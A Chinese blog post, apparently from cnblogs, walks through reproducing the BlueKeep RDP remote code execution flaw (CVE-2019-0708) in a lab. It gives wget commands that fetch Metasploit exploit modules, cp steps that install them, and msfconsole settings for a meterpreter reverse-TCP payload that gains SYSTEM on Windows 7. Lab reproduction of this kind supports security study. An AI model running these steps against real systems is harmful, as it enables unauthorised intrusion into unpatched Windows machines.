• jQuery火箭图标返回顶部代码


    windows RDP远程代码执行_CVE-2019-0708漏洞复现

    一、漏洞概述

    2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。

    二、漏洞影响版本

    Windows 7

    Windows server 2008 R2

    Windows server 2008

    Windows 2003

    Windows xp

    注:Windows 8和windows10以及之后的版本不受此漏洞影响

    三、漏洞环境搭建

    目标机:windows xp  IP:192.168.45.135

    攻击机:kali系统、win7(安装python3环境,安装impacket模块)

    条件:目标机开启3389端口,关闭防火墙

    四、漏洞复现

    1、 目标3389端口,关闭防火墙(或者在防火墙策略中放行3389端口)

    2、 使用msf中相应的模块验证是否存在漏洞

    2.1、升级msf版本

         apt-get update

         apt-get install metasploit-framework

         注意:不升级msf,使用msf v4版本加载第三方脚本,会报错,可能只因为cve-2019-0708的脚本只兼容最新的msf版本(msf v5)

    2.2、启动msf,可以看到msf当前的版本

     2.3、搜索cve-2019-0708脚本

      2.4、使用脚本,设置参数

    2.5、开始攻击,下图说明目标存在漏洞

     

     二、 0708最新payload复现。

    环境:

    目标机:win7 sp1 x64 IP:192.168.48.135    (开启3389,关闭防火墙)

    攻击机: kali IP192.168.48  IP:192.168.48.138

    1. 首先我们在github上下载最新的poc, 复制的时候如果目录不存在 ,可以手动makedir

    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
    
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    
    cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
    cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
    cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
    cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

      

    2. 更新我们的msf

    更新以后使用reload_all重新加载0708rdp利用模块

    3.搜索关于0708的poc

    4.     use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

      set payload windows/x64/meterpreter/reversr_tcp

    5.  设置好IP

    6. 设置好target为3

    7.  多run几次,就可以成功  我们也可以看到直接是system权限

  • 相关阅读:
    Maven 跳过测试的几种方式
    Java Optional 初始为空
    Java 8 中的设计模式策略
    Java 8 开始新增的 Optional 类 Optional 对象中的返回
    关于AWSIAMcertificate证书的说明
    VUE 常规截取和特殊字符之前之后截取
    vue判断字符串中是否包含某个字符串
    图片文字居中显示
    获取Java对象中所有的属性名称和属性值
    12注册中心consul
  • 原文地址:https://www.cnblogs.com/kuaile1314/p/11480802.html
Copyright © 2020-2023  润新知